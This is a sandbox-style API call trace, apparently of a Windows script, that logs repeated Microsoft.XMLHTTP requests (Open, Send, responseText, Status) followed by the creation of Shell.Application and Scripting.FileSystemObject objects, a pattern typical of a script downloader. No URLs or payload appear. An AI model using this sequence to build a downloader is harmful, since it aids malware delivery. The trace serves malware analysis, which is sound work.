	[0578.304] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0578.304] XMLHTTPRequest:IUnknown:Release (This=0x49c5bf8) returned 0x0
	[0578.304] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b90, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5b90) returned 0x0
	[0578.304] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5b90) returned 0x3
	[0578.304] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b90, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0578.304] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5b90, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0578.305] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b90, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0578.305] longjmp () 
	[0578.305] longjmp () 
	[0578.305] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0578.305] SysStringLen (param_1=0x0) returned 0x0
	[0578.305] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0578.305] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0578.305] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7450) returned 0x0
	[0578.305] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0578.305] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c74b8) returned 0x0
	[0578.305] ??2@YAPEAX_K@Z () returned 0x62f310
	[0578.305] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c74b8, pUnkSite=0x62f310) 
	[0578.305] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0578.305] XMLHTTPRequest:IUnknown:Release (This=0x49c74b8) returned 0x0
	[0578.306] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7450) returned 0x0
	[0578.306] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7450) returned 0x3
	[0578.306] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0578.306] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7450, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0578.306] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0578.306] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0578.306] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7450, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Send", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=5) returned 0x0
	[0578.306] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0581.464] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd48 | out: ppvObject=0x28dd48*=0x0) returned 0x80004002
	[0581.465] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7450, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28de60*="responseText", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc9c | out: rgDispId=0x28dc9c*=10) returned 0x0
	[0581.465] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0581.465] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
	[0581.465] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7450, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
	[0581.465] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
	[0581.465] CLSIDFromProgIDEx (in: lpszProgID="Shell.Application", lpclsid=0x28c350 | out: lpclsid=0x28c350*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0))) returned 0x0
	[0581.465] SysStringLen (param_1=0x0) returned 0x0
	[0581.465] CoGetClassObject (in: rclsid=0x28c350*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28c320 | out: ppv=0x28c320*=0x7fefe928d20) returned 0x0
	[0581.465] Shell:IUnknown:QueryInterface (in: This=0x7fefe928d20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28c328 | out: ppvObject=0x28c328*=0x0) returned 0x80004002
	[0581.465] Shell:IClassFactory:CreateInstance (in: This=0x7fefe928d20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c310 | out: ppvObject=0x28c310*=0x396820) returned 0x0
	[0581.465] Shell:IUnknown:Release (This=0x7fefe928d20) returned 0x1
	[0581.466] Shell:IUnknown:QueryInterface (in: This=0x396820, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28c2e8 | out: ppvObject=0x28c2e8*=0x396860) returned 0x0
	[0581.466] ??2@YAPEAX_K@Z () returned 0x62f350
	[0581.466] Shell:IObjectWithSite:SetSite (This=0x396860, pUnkSite=0x62f350) returned 0x0
	[0581.466] XMLHTTPRequest:IUnknown:AddRef (This=0x62f350) returned 0x2
	[0581.466] Shell:IUnknown:Release (This=0x396860) returned 0x1
	[0581.466] Shell:IUnknown:QueryInterface (in: This=0x396820, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c2f8 | out: ppvObject=0x28c2f8*=0x396820) returned 0x0
	[0581.466] Shell:IUnknown:AddRef (This=0x396820) returned 0x3
	[0581.466] CLSIDFromProgIDEx (in: lpszProgID="Scripting.FileSystemObject", lpclsid=0x28c350 | out: lpclsid=0x28c350*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28))) returned 0x0
	[0581.466] SysStringLen (param_1=0x0) returned 0x0
	[0581.466] CoGetClassObject (in: rclsid=0x28c350*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28c320 | out: ppv=0x28c320*=0x45f030) returned 0x0
	[0581.469] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f030, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28c328 | out: ppvObject=0x28c328*=0x0) returned 0x80004002
	[0581.469] FileSystemObject:IClassFactory:CreateInstance (in: This=0x45f030, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c310 | out: ppvObject=0x28c310*=0x45f000) returned 0x0
	[0581.469] FileSystemObject:IUnknown:Release (This=0x45f030) returned 0x0
	[0581.469] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f000, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28c2e8 | out: ppvObject=0x28c2e8*=0x0) returned 0x80004002
	[0581.469] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f000, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c2f8 | out: ppvObject=0x28c2f8*=0x45f000) returned 0x0
	[0581.469] FileSystemObject:IUnknown:AddRef (This=0x45f000) returned 0x3
	[0584.642] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
	[0584.642] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7450, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
	[0584.642] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
	[0584.644] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0584.644] SysStringLen (param_1=0x0) returned 0x0
	[0584.644] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0584.644] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0584.644] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7450) returned 0x0
	[0584.644] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0584.644] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7c58) returned 0x0
	[0584.644] ??2@YAPEAX_K@Z () returned 0x62f310
	[0584.644] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7c58, pUnkSite=0x62f310) 
	[0584.645] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0584.645] XMLHTTPRequest:IUnknown:Release (This=0x49c7c58) returned 0x0
	[0584.645] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7450) returned 0x0
	[0584.645] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7450) returned 0x3
	[0584.645] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0584.645] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7450, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0584.647] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0584.648] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0584.648] SysStringLen (param_1=0x0) returned 0x0
	[0584.648] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0584.648] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0584.648] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c74b0) returned 0x0
	[0584.648] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0584.648] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74b0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5ba8) returned 0x0
	[0584.648] ??2@YAPEAX_K@Z () returned 0x62f330
	[0584.648] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5ba8, pUnkSite=0x62f330) 
	[0584.648] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0584.648] XMLHTTPRequest:IUnknown:Release (This=0x49c5ba8) returned 0x0
	[0584.648] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74b0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c74b0) returned 0x0
	[0584.649] XMLHTTPRequest:IUnknown:AddRef (This=0x49c74b0) returned 0x3
	[0584.649] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74b0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0584.649] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c74b0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0584.649] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74b0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0584.649] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0584.649] SysStringLen (param_1=0x0) returned 0x0
	[0584.649] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0584.649] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0584.649] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7560) returned 0x0
	[0584.650] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0584.650] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7560, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5b58) returned 0x0
	[0584.650] ??2@YAPEAX_K@Z () returned 0x62f310
	[0584.650] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5b58, pUnkSite=0x62f310) 
